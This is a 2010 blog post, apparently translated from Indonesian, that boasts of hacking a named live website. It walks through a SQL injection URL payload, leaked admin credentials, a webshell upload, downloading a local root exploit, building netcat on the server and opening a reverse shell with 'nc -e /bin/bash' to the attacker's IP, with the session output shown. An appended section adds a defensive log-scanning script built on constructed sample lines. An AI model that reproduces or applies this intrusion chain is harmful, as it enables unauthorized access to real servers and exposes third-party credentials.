Saturday, 07 August 2010

[POC] SQL injection to Root Part 2

heheheh moving on, I don't know what else to say, bear with me, I'm a total noob :D

target
[url=http://www.pubbkk.com]http://www.pubbkk.com[/url]
step 1 (since there's already a tool, I'm too lazy to inject manually) :)


use the tool kerinci version 0.7, download it at [url=http://kerinci.net]kerinci.net[/url]
http://www.pubbkk.com/view_detail.php?id=103/**/AND/**/__TIME__=0/**/UNION/**/ALL/**/SELECT/**/1,/**/2,/**/3,/**/__CODE__--

[pubbkk]
admin           : id,count,password,email,date
yakuzakiku : yakuza2529 : yakuza2529 : 2007-04-05
log in here

[url=http://www.pubbkk.com/admin/]http://www.pubbkk.com/admin/[/url]

upload shell

then explore first
here's the shell
http://www.pubbkk.com/wenkhairu.txt
http://www.pubbkk.com/upload/girls/thumb_92x52/1.php
time to get root bebe :)

check the Linux kernel
uname -a

Linux linux1.yes-hosting.com 2.6.15-54-server #1 SMP Tue Aug 18 17:32:23 UTC 2009 i686 GNU/Linux
browse for a local root exploit and download it
wget http://www.exploit-db.com/sploits/android-root-20090816.tar.gz
check whether perl and gcc are available
whereis perl
whereis gcc
perl: /usr/bin/perl /usr/bin/perl.my /etc/perl /usr/lib/perl /usr/bin/X11/perl /usr/bin/X11/perl.my /usr/local/lib/perl /usr/share/perl /usr/share/man/man1/perl.1.gz

gcc: /usr/bin/gcc /usr/lib/gcc /usr/bin/X11/gcc /usr/share/man/man1/gcc.1.gz
do a backconnect

for how to do a backconnect, see bro wisdom's thread here [url=http://forum.devilzc0de.org/thread-2741.html]http://forum.devilzc0de.org/thread-2741.html[/url]
once that's done, get netcat ready on your PC, then listen on a port
wenkhairu@localhost:$ nc -vlp 12345
listening on [any] 12345 ...
if you want to use netcat on the target server too, that's fine

here's how


download netcat
wget http://www.net-security.org/dl/software/netcat-0.7.1.tar.bz2
install netcat on the target
tar -jxvf netcat-0.7.1.tar.bz2
cd netcat-0.7.1
./configure
make
./nc -vv [OUR_IP] 12345 -e /bin/bash
wenkhairu@localhost:$ nc -vlp 12345
listening on [any] 12345 ...
connect to [180.214.232.22] from (UNKNOWN) [61.19.242.241] 12345
id
uid=48(nobody) gid=48(nobody) groups=48(nobody)
uname -a
Linux linux1.yes-hosting.com 2.6.15-54-server #1 SMP Tue Aug 18 17:32:23 UTC 2009 i686
use the local root exploit from the connected session


so we are root now

that's it for now, feel free to explore further, sorry there are no pictures, I didn't get a chance to capture any since I'm already sleepy :)

I'm off to bed heheheh
happy rooting dude
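
From the defender's side, the two web-facing steps above (the comment-padded UNION SELECT in the id parameter, and a .php file being requested from the upload directory) both leave traces in the web server's access log. The following is an added example, not part of the original post: the log lines are constructed, the IPs are documentation placeholders, and the /upload/ prefix and regexes are assumptions modelled on the URLs shown in the post.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Constructed access-log lines (not real traffic); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Aug/2010:01:02:03 +0700] "GET /view_detail.php?id=103 HTTP/1.1" 200 5120
203.0.113.9 - - [07/Aug/2010:01:05:10 +0700] "GET /view_detail.php?id=103/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/1,/**/2,/**/3-- HTTP/1.1" 200 4801
203.0.113.9 - - [07/Aug/2010:01:09:44 +0700] "GET /view_detail.php?id=103%20union%20select%201,2 HTTP/1.1" 200 4790
203.0.113.9 - - [07/Aug/2010:01:20:31 +0700] "POST /upload/girls/thumb_92x52/1.php HTTP/1.1" 200 312
203.0.113.7 - - [07/Aug/2010:01:21:00 +0700] "GET /upload/girls/thumb_92x52/1.jpg HTTP/1.1" 200 2048
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" \d{3}')
SQL_COMMENT = re.compile(r"/\*.*?\*/")          # /**/ used in place of spaces
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
# Assumption: user uploads live under /upload/ and should never be scripts.
SCRIPT_IN_UPLOADS = re.compile(r"^/upload/.*\.(?:php\d?|phtml)$", re.I)


def classify(line):
    """Return (client_ip, request_target, findings) or None if nothing matched."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, target = m.groups()
    parts = urlsplit(target)
    findings = []
    # Normalise first: URL-decode, then turn inline SQL comments into spaces,
    # so "UNION/**/ALL/**/SELECT" and "union%20select" look the same.
    query = SQL_COMMENT.sub(" ", unquote_plus(parts.query))
    if UNION_SELECT.search(query):
        findings.append("sqli-union-select")
    if SCRIPT_IN_UPLOADS.match(unquote(parts.path)):
        findings.append("script-in-upload-dir")
    return (ip, target, findings) if findings else None


def scan(log_text):
    """Classify every line and keep only the ones with findings."""
    hits = (classify(line) for line in log_text.splitlines())
    return [h for h in hits if h]


if __name__ == "__main__":
    for ip, target, findings in scan(SAMPLE_LOG):
        print(ip, ",".join(findings), target)
```

Hits like these are a starting point for investigation; the durable fixes for the chain in this post are parameterized queries in the page that takes the id parameter and disabling script execution in the upload directory.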
